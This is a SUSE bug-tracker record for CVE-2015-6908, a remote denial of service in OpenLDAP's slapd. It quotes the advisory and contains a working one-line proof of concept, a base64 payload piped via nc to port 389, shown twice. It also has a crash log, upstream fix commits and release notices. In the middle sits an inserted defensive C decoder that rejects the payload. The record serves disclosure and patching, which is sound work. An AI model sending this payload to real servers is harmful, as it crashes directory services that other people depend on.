Bug 945582 - (CVE-2015-6908) VUL-0: CVE-2015-6908: openldap2: ber_get_next remote denial of service vulnerability
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other   OS: Other
Priority: P2 - High   Severity: Major
Assigned To: Howard Guo
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/156508/
Whiteboard: CVSSv2:RedHat:CVE-2015-6908:5.0:(AV:N...
Depends on:
Blocks: 987916
Reported: 2015-09-12 05:50 UTC by Marcus Meissner
Modified: 2017-08-02 14:02 UTC (History)
Found By: Security Response Team

Attachments
CVE-2015-6908.patch (2.00 KB, patch)
2015-10-02 11:57 UTC, Andreas Stieger

Description Marcus Meissner 2015-09-12 05:50:02 UTC
via oss-sec

http://www.openldap.org/its/index.cgi/Software%20Bugs?id=8240
OpenLDAP ber_get_next Denial of Service
Affected Versions: OpenLDAP <= 2.4.42

+-------------+
| Description |
+-------------+
This document details a vulnerability found within the OpenLDAP server daemon. A
Denial of Service vulnerability was discovered within the slapd daemon, allowing
an unauthenticated attacker to crash the OpenLDAP server.

By sending a crafted packet, an attacker may cause the OpenLDAP server to reach
an assert() statement, crashing the daemon. This was tested on OpenLDAP 2.4.42
(built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian package
repository.

+--------------+
| Exploitation |
+--------------+
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash
with a SIGABRT. This is due to an assert() call within the ber_get_next method
(io.c line 682) that is hit when decoding tampered BER data. 

The following proof of concept exploit can be used to trigger the condition:

--[ Exploit POC
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

The above causes slapd to abort as follows when running with '-d3', however it
should be noted that this will crash the server even when running in daemon
mode. 

--[ slapd -d3
55f0b36e slap_listener_activate(7): 
55f0b36e >>> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  ff 84 84 84 84 84 77 83                            ......w.          
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=1, got=1
  0000:  0a                                                 .                 
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
slapd: io.c:682: ber_get_next: Assertion `0' failed.

The following GDB back trace provides further information as to the location of
the issue.

--[ back trace
Program received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56	../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff6a144e8 in __GI_abort () at abort.c:89
#2  0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
#3  0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
#4  0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682
#5  0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572
#6  connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460
#7  connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
#8  0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
#9  0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309
#10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111

+----------+
| Solution |
+----------+
Ensure that data received from untrusted sources is not able to trigger
conditions resulting in the server crashing. In this specific instance, the
NDEBUG macro should be defined before the inclusion of assert.h by default,
requiring a specific compile time alteration to enable debug.
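The PoC bytes in the advisory decode to a 7-byte high-tag-number tag (ff 84 84 84 84 84 77: private class, constructed) followed by a three-octet long-form length (83 0a 62 3e, i.e. 680510 bytes). The decoder below is an added example, not liblber's ber_get_next and not code from the advisory, the OpenLDAP project or the SUSE maintainers. It walks exactly that tag and length encoding and reports every malformed or out-of-policy header as a return code, so nothing a peer sends can reach an assert(). The limits it enforces (accepted tag bytes, accepted length octets, a 256 KiB content cap) are this example's own policy, chosen here for illustration and not slapd's configuration; the embedded sample is the advisory's PoC decoded from base64.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not liblber code: a BER tag+length header decoder that
 * treats every malformed input as a return value instead of an invariant
 * violation. The limits below are this example's own policy, not slapd's. */

enum ber_status {
    BER_OK = 0,
    BER_TRUNCATED,       /* more bytes needed before a verdict is possible */
    BER_TAG_TOO_LONG,    /* high-tag-number form longer than policy allows  */
    BER_LEN_INDEFINITE,  /* length octet 0x80; LDAP requires definite form  */
    BER_LEN_TOO_LONG,    /* more length octets than policy allows           */
    BER_LEN_EXCEEDS_MAX  /* definite length larger than the caller's cap    */
};

struct ber_limits {
    size_t   max_tag_bytes;  /* encoded tag bytes accepted, first byte included */
    size_t   max_len_bytes;  /* long-form length octets accepted (<= 8)         */
    uint64_t max_content;    /* largest element length the caller will buffer   */
};

struct ber_hdr {
    unsigned tag_class;      /* 0 universal, 1 application, 2 context, 3 private */
    int      constructed;
    uint64_t tag_number;
    uint64_t length;
    size_t   hdr_bytes;      /* bytes consumed by tag + length octets */
};

enum ber_status ber_parse_header(const unsigned char *buf, size_t n,
                                 const struct ber_limits *lim,
                                 struct ber_hdr *h)
{
    size_t i;
    if (n == 0) return BER_TRUNCATED;

    h->tag_class   = buf[0] >> 6;
    h->constructed = (buf[0] & 0x20) != 0;
    h->tag_number  = buf[0] & 0x1f;
    i = 1;

    if (h->tag_number == 0x1f) {
        /* High-tag-number form: base-128 digits, MSB set on all but the last.
         * The loop is bounded by policy, never by what the peer sends. */
        h->tag_number = 0;
        for (;;) {
            if (i >= lim->max_tag_bytes) return BER_TAG_TOO_LONG;
            if (i >= n)                  return BER_TRUNCATED;
            h->tag_number = (h->tag_number << 7) | (buf[i] & 0x7f);
            if ((buf[i++] & 0x80) == 0) break;
        }
    }

    if (i >= n) return BER_TRUNCATED;
    unsigned char c = buf[i++];
    if (c < 0x80) {
        h->length = c;                         /* short form */
    } else {
        size_t nlen = c & 0x7f;
        if (nlen == 0) return BER_LEN_INDEFINITE;
        if (nlen > lim->max_len_bytes || nlen > sizeof(uint64_t))
            return BER_LEN_TOO_LONG;
        h->length = 0;
        while (nlen--) {                       /* long form, big-endian */
            if (i >= n) return BER_TRUNCATED;
            h->length = (h->length << 8) | buf[i++];
        }
    }
    h->hdr_bytes = i;
    if (h->length > lim->max_content) return BER_LEN_EXCEEDS_MAX;
    return BER_OK;
}

/* The advisory's proof-of-concept bytes ("/4SEhISEd4MKYj5ZMgAAAC8=" decoded). */
static const unsigned char poc[] = {
    0xff, 0x84, 0x84, 0x84, 0x84, 0x84, 0x77, 0x83,
    0x0a, 0x62, 0x3e, 0x59, 0x32, 0x00, 0x00, 0x00, 0x2f
};

/* Run the PoC header through the decoder under a chosen tag policy and cap. */
enum ber_status parse_poc(size_t max_tag_bytes, uint64_t max_content,
                          struct ber_hdr *h)
{
    struct ber_limits lim = { max_tag_bytes, 4, max_content };
    return ber_parse_header(poc, sizeof poc, &lim, h);
}

/* Convenience wrapper with the example's default policy, for other inputs. */
enum ber_status parse_bytes(const unsigned char *buf, size_t n, struct ber_hdr *h)
{
    struct ber_limits lim = { 8, 4, 256 * 1024 };
    return ber_parse_header(buf, n, &lim, h);
}

int main(void)
{
    struct ber_hdr h;
    /* Permissive tag policy: the 7-byte private-class tag decodes, then the
     * 3-octet length (0x0a623e = 680510) exceeds the 256 KiB cap. */
    printf("permissive policy: status=%d\n", (int)parse_poc(8, 256 * 1024, &h));
    /* Tight policy: the PoC is rejected four bytes in, before any length
     * handling runs. LDAP itself never needs more than a one-byte tag. */
    printf("tight policy:      status=%d\n", (int)parse_poc(4, 256 * 1024, &h));
    return 0;
}
```

Run stand-alone, main() reports BER_LEN_EXCEEDS_MAX for the permissive policy and BER_TAG_TOO_LONG for the tight one; in neither case does the header reach a point where the decoder could be "messed up" in the sense of the removed assert, because the checks run before any state is derived from the peer's bytes. Since every LDAP protocol tag fits in a single byte, a production policy for an LDAP listener could set max_tag_bytes to 1.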
Comment 1 Marcus Meissner 2015-09-12 05:50:47 UTC
QA REPRODUCER:

echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389

before:
abort() the ldap server

after:
not aborting the ldap server
Comment 2 Marcus Meissner 2015-09-12 05:55:24 UTC
the assert(0) at the end of ber_get_next is even in sle10
Comment 3 Victor Pereira 2015-09-30 08:49:42 UTC
hi maintainer,

could you please submit to the affected codestreams?
Comment 4 Andreas Stieger 2015-10-02 11:57:45 UTC
Created attachment 649914 [details]
CVE-2015-6908.patch

There was some discussion upstream about whether this was a bug. The back-and-forth simple patch is below and attached as a combined patch.
commit 844ee7df820fa397249ce76984d2e7094746cd93
Author: Howard Chu <hyc@symas.com>
Date:   Sat Sep 12 22:18:22 2015 +0100

    Revert "Revert "ITS#8240 remove obsolete assert""
    
    We have never documented our use of assert, so can't expect
    builders to do the right thing.
    This reverts commit 55dd4d3275d24c5190fdfada8dfae0320628b993.

commit 55dd4d3275d24c5190fdfada8dfae0320628b993
Author: Howard Chu <hyc@openldap.org>
Date:   Sat Sep 12 10:07:16 2015 +0100

    Revert "ITS#8240 remove obsolete assert"
    
    Not a bug.
    This reverts commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629.

commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
Author: Howard Chu <hyc@openldap.org>
Date:   Thu Sep 10 00:37:32 2015 +0100

    ITS#8240 remove obsolete assert
Comment 6 Swamp Workflow Management 2015-10-02 12:01:03 UTC
An update workflow for this issue was started.
This issue was rated as important.
Please submit fixed packages until 2015-10-09.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/62299
Comment 9 Sebastian Krahmer 2015-11-30 14:45:46 UTC
poing
Comment 14 Bernhard Wiedemann 2015-12-02 14:00:13 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/347172 Factory / openldap2
Comment 16 Swamp Workflow Management 2016-01-12 19:13:09 UTC
SUSE-SU-2016:0090-1: An update that fixes one vulnerability is now available.

Category: security (moderate)
Bug References: 945582
CVE References: CVE-2015-6908
Sources used:
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Software Development Kit 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server for VMWare 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.62.3
SUSE Linux Enterprise Desktop 11-SP4 (src):    openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Desktop 11-SP3 (src):    openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.62.2, openldap2-client-2.4.26-0.62.2, openldap2-client-openssl1-2.4.26-0.62.3
Comment 23 Andreas Stieger 2016-01-14 19:46:44 UTC
For bsc#904028, bsc#937766, bsc#945582, bsc#955210 please submit for openSUSE 13.2 maintenance.
Comment 24 Bernhard Wiedemann 2016-01-18 10:00:32 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/354485 13.2 / openldap2
Comment 25 Swamp Workflow Management 2016-01-25 12:12:32 UTC
SUSE-SU-2016:0224-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Software Development Kit 12 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Server for SAP 12 (src):    openldap2-2.4.41-18.13.4
SUSE Linux Enterprise Server 12-SP1 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Server 12 (src):    openldap2-2.4.41-18.13.4, openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-18.13.4
SUSE Linux Enterprise Desktop 12-SP1 (src):    openldap2-client-2.4.41-18.13.1
SUSE Linux Enterprise Desktop 12 (src):    openldap2-client-2.4.41-18.13.1
Comment 26 Swamp Workflow Management 2016-01-25 12:14:10 UTC
openSUSE-SU-2016:0226-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 904028,937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE 13.2 (src):    openldap2-2.4.39-8.9.1, openldap2-client-2.4.39-8.9.1
Comment 27 Swamp Workflow Management 2016-01-27 10:12:34 UTC
openSUSE-SU-2016:0255-1: An update that solves two vulnerabilities and has two fixes is now available.

Category: security (important)
Bug References: 904028,937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE 13.1 (src):    openldap2-2.4.33-8.6.1, openldap2-client-2.4.33-8.6.1
Comment 28 Andreas Stieger 2016-01-27 15:35:44 UTC
Releasing last updates, all done
Comment 29 Swamp Workflow Management 2016-01-27 18:12:16 UTC
openSUSE-SU-2016:0261-1: An update that solves two vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 937766,945582,955210
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
openSUSE Leap 42.1 (src):    openldap2-2.4.41-11.1, openldap2-client-2.4.41-11.1
Comment 30 Swamp Workflow Management 2016-01-27 18:12:55 UTC
SUSE-SU-2016:0262-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 937766,945582
CVE References: CVE-2015-4000,CVE-2015-6908
Sources used:
SUSE Studio Onsite 1.3 (src):    openldap2-client-2.4.26-0.17.23.1
Comment 34 Bernhard Wiedemann 2017-08-02 14:02:15 UTC
This is an autogenerated message for OBS integration:
This bug (945582) was mentioned in
https://build.opensuse.org/request/show/514048 42.3 / openldap2